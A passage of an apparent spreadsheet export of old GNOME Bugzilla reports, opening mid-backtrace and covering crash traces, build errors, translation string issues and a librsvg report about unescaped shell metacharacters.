    v_double = -1.8030776977539098 v_pointer = 0x10} {v_int = -1231062956 
    v_long = -1231062956 v_int64 = 3063904340 
    v_double = 1.5137698765378982e-314 v_pointer = 0xb69f7854}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 3221018928 data = {{v_int = 144813408 
      v_uint = 144813408 v_long = 144813408 v_ulong = 144813408 
      v_int64 = -5288170180883403424 v_uint64 = 13158573892826148192 
      v_float = 9.7305953e-34 v_double = -1.2544013338140187e-45 
      v_pointer = 0x8a1ad60} {v_int = 151370996 v_uint = 151370996 
      v_long = 151370996 v_ulong = 151370996 v_int64 = -4612572877483033356 
      v_uint64 = 13834171196226518260 v_float = 1.6098138e-33 
      v_double = -1.8030777313650193 v_pointer = 0x905bcf4}}}
	error = 
	instance_and_params = (GValue *) 0xbffcd754
	stack_values = {{g_type = 136137208 data = {{v_int = 148604312 
        v_uint = 148604312 v_long = 148604312 v_ulong = 148604312 
        v_int64 = 148604312 v_uint64 = 148604312 v_float = 1.32119908e-33 
        v_double = 7.3420285383074104e-316 v_pointer = 0x8db8598} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 136137808 data = {{v_int = 136146096 v_uint = 136146096 
        v_long = 136146096 v_ulong = 136146096 v_int64 = 136146096 
        v_uint64 = 136146096 v_float = 4.73732305e-34 
        v_double = 6.7265108849004353e-316 v_pointer = 0x81d6cb0} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 68 data = {{v_int = 144813408 v_uint = 144813408 
        v_long = 144813408 v_ulong = 144813408 v_int64 = 144813408 
        v_uint64 = 144813408 v_float = 9.7305953e-34 
        v_double = 7.1547329949991939e-316 v_pointer = 0x8a1ad60} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 3221018748 data = {{v_int = -1218949132 v_uint = 3076018164 
        v_long = -1218949132 v_ulong = 3076018164 
        v_int64 = -4612573888170668044 v_uint64 = 13834170185538883572 
        v_float = -1.28932188e-05 v_double = -1.8028533136284723 
        v_pointer = 0xb7584ff4} {v_int = -1219126155 v_uint = 3075841141 
        v_long = -1219126155 v_ulong = 3075841141 
        v_int64 = 584743050053786741 v_uint64 = 584743050053786741 
        v_float = -1.27322173e-05 v_double = 1.3924350327061186e-269 
        v_pointer = 0xb7559c75}}} {g_type = 151 data = {{
        v_int = -1073948600 v_uint = 3221018696 v_long = -1073948600 
        v_ulong = 3221018696 v_int64 = 634617876887427144 
        v_uint64 = 634617876887427144 v_float = -1.97535038 
        v_double = 2.9671314835120847e-266 v_pointer = 0xbffcd848} {
        v_int = -1073948600 v_uint = 3221018696 v_long = -1073948600 
        v_ulong = 3221018696 v_int64 = -5235346654206568376 
        v_uint64 = 13211397419502983240 v_float = -1.97535038 
        v_double = -4.3608100305976052e-42 v_pointer = 0xbffcd848}}} {
    g_type = 3221018696 data = {{v_int = -1219116836 v_uint = 3075850460 
        v_long = -1219116836 v_ulong = 3075850460 
        v_int64 = -5294224346672938788 v_uint64 = 13152519727036612828 
        v_float = -1.27406929e-05 v_double = -5.0658570545092822e-46 
        v_pointer = 0xb755c0dc} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 17179869184 v_uint64 = 17179869184 
        v_float = 0 v_double = 8.4879831638610893e-314 v_pointer = 0x0}}} {
    g_type = 3075836938 data = {{v_int = 136146100 v_uint = 136146100 
        v_long = 136146100 v_ulong = 136146100 
        v_int64 = -4612574475226092364 v_uint64 = 13834169598483459252 
        v_float = 4.73732489e-34 v_double = -1.8027229611387101 
        v_pointer = 0x81d6cb4} {v_int = 4 v_uint = 4 v_long = 4 
        v_ulong = 4 v_int64 = 4294967300 v_uint64 = 4294967300 
        v_float = 5.60519386e-45 v_double = 2.1219957929415349e-314 
        v_pointer = 0x4}}} {g_type = 3062309633 data = {{
        v_int = -1218219247 v_uint = 3076748049 v_long = -1218219247 
        v_ulong = 3076748049 v_int64 = 634617859563287313 
        v_uint64 = 634617859563287313 v_float = -1.35570453e-05 
        v_double = 2.9671255185768221e-266 v_pointer = 0xb7637311} {
        v_int = -1232259156 v_uint = 3062708140 v_long = -1232259156 
        v_ulong = 3062708140 v_int64 = 46766666626988 
        v_uint64 = 46766666626988 v_float = -4.20860852e-06 
        v_double = 2.3105803350905097e-310 v_pointer = 0xb68d37ac}}} {
    g_type = 24 data = {{v_int = -1073948600 v_uint = 3221018696 
        v_long = -1073948600 v_ulong = 3221018696 
        v_int64 = -4612574351882135480 v_uint64 = 13834169721827416136 
        v_float = -1.97535038 v_double = -1.8027503489988863 
        v_pointer = 0xbffcd848} {v_int = -1218949944 v_uint = 3076017352 
        v_long = -1218949944 v_ulong = 3076017352 v_int64 = 690270784712 
        v_uint64 = 690270784712 v_float = -1.28924803e-05 
        v_double = 3.4103908105407833e-312 v_pointer = 0xb7584cc8}}} {
    g_type = 117440515 data = {{v_int = -1215646952 v_uint = 3079320344 
        v_long = -1215646952 v_ulong = 3079320344 v_int64 = 466935788312 
        v_uint64 = 466935788312 v_float = -1.6534279e-05 
        v_double = 2.3069693181875986e-312 v_pointer = 0xb78ab318} {
        v_int = 72 v_uint = 72 v_long = 72 v_ulong = 72 
        v_int64 = 650133460203077704 v_uint64 = 650133460203077704 
        v_float = 1.00893489e-43 v_double = 3.3708090753313502e-265 
        v_pointer = 0x48}}} {g_type = 3076018164 data = {{v_int = 1 
        v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = -5321730080521584639 
        v_uint64 = 13125013993187966977 v_float = 1.40129846e-45 
        v_double = -7.3269668332318037e-48 v_pointer = 0x1} {
        v_int = 136146096 v_uint = 136146096 v_long = 136146096 
        v_ulong = 136146096 v_int64 = -5235346657291440976 
        v_uint64 = 13211397416418110640 v_float = 4.73732305e-34 
        v_double = -4.3608080648033708e-42 v_pointer = 0x81d6cb0}}} {
    g_type = 136138120 data = {{v_int = -1218948044 v_uint = 3076019252 
        v_long = -1218948044 v_ulong = 3076019252 
        v_int64 = 644250972991280180 v_uint64 = 644250972991280180 
        v_float = -1.28942083e-05 v_double = 1.3055888466931544e-265 
        v_pointer = 0xb7585434} {v_int = -1219133787 v_uint = 3075833509 
        v_long = -1219133787 v_ulong = 3075833509 
        v_int64 = 584532716915359397 v_uint64 = 584532716915359397 
        v_float = -1.27252761e-05 </t>
  </si>
  <si>
    <t>GAMIN-306909</t>
  </si>
  <si>
    <t>GAMIN</t>
  </si>
  <si>
    <t>missing const in declaration</t>
  </si>
  <si>
    <t>Please describe the problem:
user in gamin_get_socket_dir needs to be const as it is assigned to the result
of gamin_get_user_name which returns a const char *.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>gamin-maint</t>
  </si>
  <si>
    <t>GIMP-MANUAL-445962</t>
  </si>
  <si>
    <t>GIMP-MANUAL</t>
  </si>
  <si>
    <t>Build System Utterly Broken</t>
  </si>
  <si>
    <t>The build system is totally broken in the current SVN version. Unfortunately the current implementation is more or less a hack and needs a rewrite to a sane state.</t>
  </si>
  <si>
    <t>POLICYKIT-GNOME-583826</t>
  </si>
  <si>
    <t>authorizations tool</t>
  </si>
  <si>
    <t>POLICYKIT-GNOME</t>
  </si>
  <si>
    <t>This module contains an old address of the FSF:  59 Temple Place Suite 330 Boston MA  02111-1307  USA
The new address is:
http://www.fsf.org/about/contact.html writes:
&gt; Free Software Foundation
&gt; 51 Franklin Street Fifth Floor
&gt; Boston MA 02110-1301
&gt; USA</t>
  </si>
  <si>
    <t>policykit-gnome-maint</t>
  </si>
  <si>
    <t>GLADE-LEGACY-115635</t>
  </si>
  <si>
    <t>GLADE-LEGACY</t>
  </si>
  <si>
    <t>Glade should support message comments for translators and respect the translatable message attribute aswell</t>
  </si>
  <si>
    <t>Glade needs to support message comments message-specific comments where a
developer can provide additional information about a message to the
translators.
Gettext has had this nice feature for quite some time. If you put a comment
like this in the code:
  /* This is the verb not the noun */
  g_printf (_(Profile))
it will be automatically extracted together with the message and written in
the pot/po files as this:
   #. This is the verb not the noun
   #: foo.c:42
   msgid Profile
   msgstr 
It would be very useful to have a similar feature in glade allowing a
comment to be attributed to a message and having that extracted and
attributed to the same message when extracted into the pot file.</t>
  </si>
  <si>
    <t>ACME-97888</t>
  </si>
  <si>
    <t>ACME</t>
  </si>
  <si>
    <t>You Suck</t>
  </si>
  <si>
    <t xml:space="preserve">Package: acme
Severity: normal
Version: 0.3.2
Synopsis: You Suck
Bugzilla-Product: acme
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.0.3)
Description:
Description of Problem:
Steps to reproduce the problem:
1. 
2. ASS
3. ASS
Actual Results:
Expected Results:
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/nautilus-gtkhtml-view'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0x40b4d739 in wait4 () from /lib/i686/libc.so.6
#0  0x40b4d739 in wait4 () from /lib/i686/libc.so.6
#1  0x40bca340 in sys_sigabbrev () from /lib/i686/libc.so.6
#2  0x40880a73 in waitpid () from /lib/i686/libpthread.so.0
#3  0x401b1525 in gnome_scores_display_with_pixmap ()
   from /usr/lib/libgnomeui-2.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-11-06 18:29 -------
The original reporter (klfh@asuihe.jf) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component hadess@hadess.net.
</t>
  </si>
  <si>
    <t>klfh</t>
  </si>
  <si>
    <t>GNOME-SHELL-570950</t>
  </si>
  <si>
    <t>OpenSUSE support for gnome-shell-build-setup.sh</t>
  </si>
  <si>
    <t>The following patch adds dependancy checking for opensuse 11.1-based systems
to gnome-shell-build-setup.sh.</t>
  </si>
  <si>
    <t>wrlach</t>
  </si>
  <si>
    <t>GTK+-74708</t>
  </si>
  <si>
    <t>process_updates reentrancy problem</t>
  </si>
  <si>
    <t>No reference is held to the windows on updates_window list
during gdk_window_process_updates() ... if one got freed
during expose event processing (takes a lot of work ... need to 
destroy it then iterate the main loop to get the destroy notify 
that removes it from the XID table) then it would still
try to access the destroyed window. (See bug 74311)</t>
  </si>
  <si>
    <t>GNOME-CORE-54950</t>
  </si>
  <si>
    <t>it crashed</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.4
Synopsis: it crashed
Class:    sw-bug
Distribution: Red Hat Linux release 7.1 (Seawolf)
System: Linux 2.4.2-2 i686 unknown
C library: glibc-2.2.2-10
C compiler: 2.96
glib: 1.2.9
GTK+: 1.2.9
ORBit: ORBit 0.5.7
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25
gnome-core: gnome-core 1.2.4
Description:
i rebooted and then it crashed
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x40637519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x40637519 in __wait4 () from /lib/i686/libc.so.6
#1  0x406a79e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4017b7e8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x405fcd89 in __libc_free (mem=0x406a5f18) at malloc.c:3055
#5  0x400aaa92 in g_free () at eval.c:41
#6  0x4049ce66 in free_sections () from /usr/lib/libgnome.so.32
#7  0x4049cecd in free_profile () from /usr/lib/libgnome.so.32
#8  0x4049e97e in gnome_config_drop_all () from /usr/lib/libgnome.so.32
#9  0x4049dfb5 in gnome_config_sync () from /usr/lib/libgnome.so.32
#10 0x0805e31d in load_up_globals () at eval.c:41
#11 0x0805602e in main () at eval.c:41
#12 0x40599177 in __libc_start_main (main=0x8055db0  argc=5 
    ubp_av=0xbffff95c init=0x8053398  fini=0x809370c  
    rtld_fini=0x4000e184  stack_end=0xbffff94c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40637519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x406a79e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4017b7e8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x405fcd89 in __libc_free (mem=0x406a5f18) at malloc.c:3055
	in malloc.c
mem = (void *) 0x0
ar_ptr = (arena *) 0xfe390000
p = 0x406a5f10
#5  0x400aaa92 in g_free () at eval.c:41
	in eval.c
ap = (void **) 0x4
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x80d9bb0 \030_j@
result = 4
result = 135109552
#6  0x4049ce66 in free_sections () from /usr/lib/libgnome.so.32
No symbol table info available.
#7  0x4049cecd in free_profile () from /usr/lib/libgnome.so.32
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-05-19 14:43 -------
The original reporter (vampyer@neo.rr.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>vampyer</t>
  </si>
  <si>
    <t>GSTREAMER-154207</t>
  </si>
  <si>
    <t>playback issue of some files</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian 3.1
Package: GStreamer
Severity: normal
Version: GNOME2.6.1 unspecified
Gnome-Distributor: Debian
Synopsis: playback issue of some files
Bugzilla-Product: GStreamer
Bugzilla-Component: don't know
Bugzilla-Version: unspecified
Description:
Description of Problem:
The playback of some of my mp3's is at double speed :-(. This happens
when I play them with rhythmbox. When I play them with XMMS the
playback is normal. I read on planet gnome to report this issue so ... tadaa
Steps to reproduce the problem:
1. play the mp3's with rhythmbox
Actual Results:
playback at double speed
Expected Results:
normal playback
How often does this happen?
always with those files
Additional Information:
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-09-30 19:10 -------
Unknown version unspecified in product GStreamer. Setting version to 0.3.3.
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product GStreamer.
   Setting to default milestone for this product 'HEAD'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was kayalion@kayalion.net.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>kayalion</t>
  </si>
  <si>
    <t>GEDIT-147661</t>
  </si>
  <si>
    <t>Make singular ngettext messages in gedit not using a specifier</t>
  </si>
  <si>
    <t>#: gedit/dialogs/gedit-close-confirmation-dialog.c:407
# c-format
msgid 
If you don't save changes from the last hour and %d minute will be 
definitively lost.
msgid_plural 
If you don't save changes from the last hour and %d minutes will be 
definitively lost.
#: gedit/dialogs/gedit-close-confirmation-dialog.c:422
# c-format
msgid 
If you don't save changes from the last %d hour will be definitively lost.
msgid_plural 
If you don't save changes from the last %d hours will be definitively lost.
I think these messages would sound better if the '%d' was removed in the
singular case i.e.:
msgid 
If you don't save changes from the last hour and minute will be 
definitively lost.
msgid_plural 
If you don't save changes from the last hour and %d minutes will be 
definitively lost.
msgid 
If you don't save changes from the last hour will be definitively lost.
msgid_plural 
If you don't save changes from the last %d hours will be definitively lost.
There are many more similar messages like this for which the same is true.
I'm fairly sure ngettext allows for the %d to be left out in the singular case
in the code since I've seen other messages in other modules do this.
There's also another reason for this suggestion. In Swedish hour is timme
but the last hour would be den senaste timmen. Saying something like den
senaste 1 timmen makes no sense.
The problem is that it appears I cannot singlehandedly change the translation
into not using a %d for the singular case since gettext will then give an
error probably because the original uses a %d.</t>
  </si>
  <si>
    <t>GTK+-323656</t>
  </si>
  <si>
    <t>syntax error in gtktextbuffer.c</t>
  </si>
  <si>
    <t>ClipboardRequest vs. ClipBoardRequest:
gtktextbuffer.c:2938: error: syntax error before '*' token
gtktextbuffer.c: In function 'free_clipboard_request':
gtktextbuffer.c:2940: error: 'request_data' undeclared (first use in this function)
gtktextbuffer.c:2940: error: (Each undeclared identifier is reported only once
gtktextbuffer.c:2940: error: for each function it appears in.)
make[4]: *** [gtktextbuffer.lo] Error 1
make[4]: Leaving directory `/storage/src/gnome-2.14/gtk+/gtk'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/storage/src/gnome-2.14/gtk+/gtk'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/storage/src/gnome-2.14/gtk+/gtk'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/storage/src/gnome-2.14/gtk+'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>martin.wehner</t>
  </si>
  <si>
    <t>GTK+-126369</t>
  </si>
  <si>
    <t>typo in gtk_style_attach comment</t>
  </si>
  <si>
    <t>Second parameter of gtk_style_attach (gtkstyle.c line 752 pos 17)
commented as of type GtkWindow should be GdkWindow (affects the gtk API
reference).</t>
  </si>
  <si>
    <t>ath</t>
  </si>
  <si>
    <t>GNOME-KEYRING-MANAGER-162829</t>
  </si>
  <si>
    <t>GNOME-KEYRING-MANAGER</t>
  </si>
  <si>
    <t>Don't include function name in gnome-keyring-manager message</t>
  </si>
  <si>
    <t>#: src/gnome-keyring-manager-keyring-editor.c:1935
msgid 
gkm_keyring_editor_update_keyring_item_info: Tried to update the information 
of a keyring item we don't know about
Please don't include function names in gettext calls at least not if you don't
want them translated by translators into something else. Replace it with an %s.
See http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#generic .</t>
  </si>
  <si>
    <t>gnome-keyring-manager-maint</t>
  </si>
  <si>
    <t>GNUMERIC-505330</t>
  </si>
  <si>
    <t>Gnumeric crashes on opening Excel 97 file</t>
  </si>
  <si>
    <t>I got this. I will attach the file and the debug log.
$ gnumeric G02hist.xls 
Reading file:///home/vinci/Desktop/G02hist.xls
Excel 97 +
warning: Can't read pathname for load map: Input/output error.
warning: Can't read pathname for load map: Input/output error.
Cannot access memory at address 0xcc0f4c60
Cannot access memory at address 0xcc0f4c60
(bug-buddy:3198): Gtk-CRITICAL **: gtk_text_buffer_emit_insert: assertion `g_utf8_validate (text len NULL)' failed</t>
  </si>
  <si>
    <t>LIBRSVG-332798</t>
  </si>
  <si>
    <t>rsvg wrapper script doesn't escape shell metacharacters</t>
  </si>
  <si>
    <t>In librsvg 2.14 the 'rsvg' converter program has been replaced with a Python script wrapping the new rsvg-convert program. The wrapper script builds a command line for the new program and executes it but does not make any attempt to escape shell metacharacters.
As a result operations on paths with spaces parentheses apostrophes etc will fail:
$ /opt/rsvg2.14.0/bin/rsvg 'US_99W_(CA).svg' 'US_99W_(CA).svg.png'
sh: -c: line 0: syntax error near unexpected token `('
sh: -c: line 0: `/opt/rsvg2.14.0/bin/rsvg-convert  -o US_99W_(CA).svg.png US_99W_(CA).svg'
I'm marking this bug as critical because scripted use (such as the server-side rasterization we do at Wikipedia or a shell-out from a desktop program) is potentially open to very serious security problems (shell injection) when used without a fix.
The script itself is marked as deprecated but as it's compatible with the previous interface other people might be using it still too.
I'm attaching a patch which adds escaping to the parameters.</t>
  </si>
  <si>
    <t>brion</t>
  </si>
  <si>
    <t>EVOLUTION-339629</t>
  </si>
  <si>
    <t>[KB-Fixed] Create New Folder parent dir inconsistent</t>
  </si>
  <si>
    <t>When creating a new folder the dialog automatically selects the currently active folder as parent folder to create the new folder in.
This behavior is *not* true for the Account root node (if supported) and thus inconstent.
Steps to reproduce:
* Right click on any Folder for example your Inbox or Sent folder. In the
  context menu select New Folder. The dialog default to the active folder
  selected before (by right clicking).
* Now do the same  but right click the On This Computer root node.
  The dialog defaults to Inbox.
This is inconsistent behavior because the On This Computer node perfectly can hold new mail folders.</t>
  </si>
  <si>
    <t>EVOLUTION-255735</t>
  </si>
  <si>
    <t>Changing signature can delete content of message</t>
  </si>
  <si>
    <t>Write a few lines of a message
switch between your various signatures. 
Some or all of your message will be deleted!</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-313927</t>
  </si>
  <si>
    <t>-I flags passed to linker</t>
  </si>
  <si>
    <t>Please describe the problem:
The flags determined by 'pkgconfig -cflags' are passed as CFLAGS not CPPFLAGS to
the makefiles meaning a boatload of -I are going to the linker phase as well as
the C compiler.
Steps to reproduce:
1. ./configure
2. make
Actual results:
During step 1:
checking TERM_CFLAGS... -DORBIT2=1 -I/usr/X11R6/include
-I/usr/X11R6/include/freetype2 -I/sw/include/glib-2.0 -I/sw/lib/glib-2.0/include
-I/sw/include/orbit-2.0 -I/sw/include/bonobo-activation-2.0
-I/sw/include/gconf/2 -I/sw/include/libbonobo-2.0 -I/sw/include/gnome-vfs-2.0
-I/sw/lib/gnome-vfs-2.0/include -I/sw/include/pango-1.0 -I/sw/include/gtk-2.0
-I/sw/include/atk-1.0 -I/sw/lib/gtk-2.0/include -I/sw/include
-I/sw/include/startup-notification-1.0 -I/sw/include/libart-2.0
-I/sw/include/libgnome-2.0 -I/sw/include/libgnomecanvas-2.0
-I/sw/include/libxml2 -I/sw/include/libbonoboui-2.0 -I/sw/include/libgnomeui-2.0
-I/sw/include/libglade-2.0  
During step 2:
/bin/sh ../libtool --tag=CC --mode=link gcc-3.3  -DORBIT2=1 -I/usr/X11R6/include
 -I/usr/X11R6/include/freetype2 -I/sw/include/glib-2.0 -I/sw/lib/glib-2.0/includ
e -I/sw/include/orbit-2.0 -I/sw/include/bonobo-activation-2.0 -I/sw/include/gcon
f/2 -I/sw/include/libbonobo-2.0 -I/sw/include/gnome-vfs-2.0 -I/sw/lib/gnome-vfs-
2.0/include -I/sw/include/pango-1.0 -I/sw/include/gtk-2.0 -I/sw/include/atk-1.0 
-I/sw/lib/gtk-2.0/include -I/sw/include -I/sw/include/startup-notification-1.0 -
I/sw/include/libart-2.0 -I/sw/include/libgnome-2.0 -I/sw/include/libgnomecanvas-
2.0 -I/sw/include/libxml2 -I/sw/include/libbonoboui-2.0 -I/sw/include/libgnomeui
-2.0 -I/sw/include/libglade-2.0   -O3 -funroll-loops -fstrict-aliasing -Wall  -L
/sw/lib -o gnome-terminal  encoding.o profile-editor.o skey-popup.o terminal.o t
erminal-accels.o terminal-profile.o terminal-screen.o terminal-widget-vte.o term
inal-window.o simple-x-font-selector.o eggaccelerators.o eggcellrendererkeys.o  
 -L/usr/X11R6/lib  -lSM -lICE -lX11  -L/usr/X11R6/lib -L/sw/lib -lglade-2.0 -lgn
omeui-2 -lbonoboui-2 -lxml2 -lpthread -lz -lgnomecanvas-2 -lgnome-2 -lpopt -lart
_lgpl_2 -lstartup-notification-1 -lvte -lncurses -lSM -lICE -lgtk-x11-2.0 -lgdk-
x11-2.0 -lXrandr -lXinerama -lXext -lXcursor -latk-1.0 -lgdk_pixbuf-2.0 -lpangox
ft-1.0 -lXft -lXrender -lpangox-1.0 -lX11 -lpangoft2-1.0 -lfontconfig -lfreetype
 -lpango-1.0 -lgobject-2.0 -lgnomevfs-2 -lbonobo-2 -lgconf-2 -lbonobo-activation
 -lORBit-2 -lm -lgmodule-2.0 -lgthread-2.0 -lglib-2.0 -lintl -liconv   skey/libs
key.la 
mkdir .libs
gcc-3.3 -DORBIT2=1 -I/usr/X11R6/include -I/usr/X11R6/include/freetype2 -I/sw/inc
lude/glib-2.0 -I/sw/lib/glib-2.0/include -I/sw/include/orbit-2.0 -I/sw/include/b
onobo-activation-2.0 -I/sw/include/gconf/2 -I/sw/include/libbonobo-2.0 -I/sw/inc
lude/gnome-vfs-2.0 -I/sw/lib/gnome-vfs-2.0/include -I/sw/include/pango-1.0 -I/sw
/include/gtk-2.0 -I/sw/include/atk-1.0 -I/sw/lib/gtk-2.0/include -I/sw/include -
I/sw/include/startup-notification-1.0 -I/sw/include/libart-2.0 -I/sw/include/lib
gnome-2.0 -I/sw/include/libgnomecanvas-2.0 -I/sw/include/libxml2 -I/sw/include/l
ibbonoboui-2.0 -I/sw/include/libgnomeui-2.0 -I/sw/include/libglade-2.0 -O3 -funr
oll-loops -fstrict-aliasing -Wall -o gnome-terminal encoding.o profile-editor.o 
skey-popup.o terminal.o terminal-accels.o terminal-profile.o terminal-screen.o t
erminal-widget-vte.o terminal-window.o simple-x-font-selector.o eggaccelerators.
o eggcellrendererkeys.o  -L/sw/lib -L/usr/X11R6/lib skey/.libs/libskey.a /sw/lib
/libglade-2.0.dylib /sw/lib/libgnomeui-2.dylib /sw/lib/libgnome-keyring.dylib /s
w/lib/libjpeg.dylib /sw/lib/libbonoboui-2.dylib /sw/lib/libgnomecanvas-2.dylib /
sw/lib/libgnome-2.dylib /sw/lib/libesd.dylib /sw/lib/libaudiofile.dylib /sw/lib/
libart_lgpl_2.dylib /sw/lib/libstartup-notification-1.dylib /sw/lib/libvte.dylib
 -lncurses -lSM -lICE /sw/lib/libgtk-x11-2.0.dylib /sw/lib/libgdk-x11-2.0.dylib 
-lXrandr -lXinerama -lXext -lXcursor /sw/lib/libatk-1.0.dylib /sw/lib/libgdk_pix
buf-2.0.dylib /sw/lib/libpangoxft-1.0.dylib -lXft -lXrender /sw/lib/libpangox-1.
0.dylib -lX11 /sw/lib/libpangoft2-1.0.dylib -lfontconfig -lfreetype /sw/lib/libp
ango-1.0.dylib /sw/lib/libgnomevfs-2.dylib /sw/lib/libxml2.dylib -ldl -lpthread 
-lz /sw/lib/libbonobo-2.dylib /sw/lib/libgconf-2.dylib /sw/lib/libbonobo-activat
ion.dylib /sw/lib/libORBitCosNaming-2.dylib /sw/lib/libORBit-2.dylib /sw/lib/lib
popt.dylib /sw/lib/libgobject-2.0.dylib -lresolv -lm /sw/lib/libgmodule-2.0.dyli
b /sw/lib/libgthread-2.0.dylib /sw/lib/libglib-2.0.dylib /sw/lib/libintl.dylib -
lc /sw/lib/libiconv.dylib
Expected results:
There's no reason to pass -I (or -D) flags when linking a bunch of .o files
together.
Does this happen every time?
Yes.
Other information:
This is with OS X 10.3.9 (darwin7.9.0/ppc) XCode-1.5 (gcc3.3).
Looks like this situation occurs in ./configure where TERM_CFLAGS is merged
into CFLAGS instead of CPPFLAGS. This patch to configure.in:
-CFLAGS=$TERM_CFLAGS $CFLAGS
+CPPFLAGS=$TERM_CFLAGS
gives the more normal behavior where TERM_CFLAGS is passed to libtool during
--mode=compile but not during --mode=link and all compiling (still) succeeds.
Or is this really a libtool bug in that libtool should be smart enough not to
pass compiler flags to the linker? If you're really paranoid that pkg-config
--cflags might give flags that are needed by the linker as well as the compiler
you could separate it into --cflags-only-I that go into CPPFLAGS and
--cflags-only-other that go into CFLAGS.</t>
  </si>
  <si>
    <t>BALSA-115888</t>
  </si>
  <si>
    <t>balsa message needs xgettext:no-c-format comment</t>
  </si>
  <si>
    <t>#: src/main-window.c:432
msgid Zoom _100%
Since this message uses a percent sign this message should probably use a
/* xgettext:no-c-format */
comment immediately preceeding that line to avoid that msgfmt complains
about the bad printf-style specifier it otherwise assumes the percent sign is.</t>
  </si>
  <si>
    <t>EVOLUTION-216364</t>
  </si>
  <si>
    <t>evolution-addressbook component freezes up when the network connection is disconnected</t>
  </si>
  <si>
    <t>Description of the problem:
- Start evolution while laptop is connected to the network.
- Connect to an LDAP server (showed up with the Verisign server when I 
did the test I couldn't access the bigfoot server).
- Click on one of the A-Z buttons on the right side of the window.
- After the search finishes remove the network card and disconnect the 
laptop from the network (a simple /sbin/ifdown will probably do as well)
- Click on a different A-Z button.
- The addressbook component freezes up.
- As long as the network connection stays down the addressbook component 
stays frozen at least for 15 minutes (I got tired of waiting after that)
I did some digging around the code.  Here's the gdb backtrace of where the 
addressbook component seems to be hung:
Program received signal SIGINT Interrupt.
[Switching to Thread 1024 (LWP 5516)]
0x40b9590e in __select () from /lib/i686/libc.so.6
(gdb) bt
#0  0x40b9590e in __select () from /lib/i686/libc.so.6
#1  0x403cf15c in __DTOR_END__ () from /usr/lib/libIIOP.so.0
#2  0x403c7bb2 in giop_main_next_message_2 (blocking=1 monitor=0x80fd0a0)
    at connection.c:1177
#3  0x403c904c in giop_recv_reply_buffer_use_multiple_2 (
    request_cnx=0x80fd0a0 request_ids=0xbffff208 block_for_reply=1)
    at giop-msg-buffer.c:1082
#4  0x403c915b in giop_recv_reply_buffer_use_2 (request_cnx=0x80fd0a0 
    request_id=3221221936 block_for_reply=1) at giop-msg-buffer.c:1131
#5  0x4031d066 in Bonobo_Unknown_ref (_obj=0x814a540 ev=0xbffff2b0)
    at Bonobo-stubs.c:82
#6  0x403494fc in bonobo_object_dup_ref (object=0x814a540 ev=0xbffff2b0)
    at bonobo-object.c:402
#7  0x4043fe5b in e_book_view_construct (book_view=0x8179988 
    corba_book_view=0x814a540 listener=0x8179540) at e-book-view.c:158
#8  0x4043ff4b in e_book_view_new (corba_book_view=0x814a540 
    listener=0x8179540) at e-book-view.c:191
#9  0x404409f4 in e_book_do_response_get_view (book=0x81220a0 
resp=0x8170ff0)
    at e-book.c:310
#10 0x40440f0a in e_book_check_listener_queue (listener=0x81223f8 
    book=0x81220a0) at e-book.c:502
#11 0x40978fe7 in gtk_marshal_NONE__NONE (object=0x81223f8 
    func=0x40440e4c  func_data=0x81220a0 
    args=0xbffff480) at gtkmarshal.c:312
#12 0x409a8706 in gtk_handlers_run (handlers=0x80b1b30 signal=0xbffff420 
    object=0x81223f8 params=0xbffff480 after=0) at gtksignal.c:1917
#13 0x409a7b57 in gtk_signal_real_emit (object=0x81223f8 signal_id=144 
    params=0xbffff480) at gtksignal.c:1477
#14 0x409a5bcc in gtk_signal_emit (object=0x81223f8 signal_id=144)
    at gtksignal.c:552
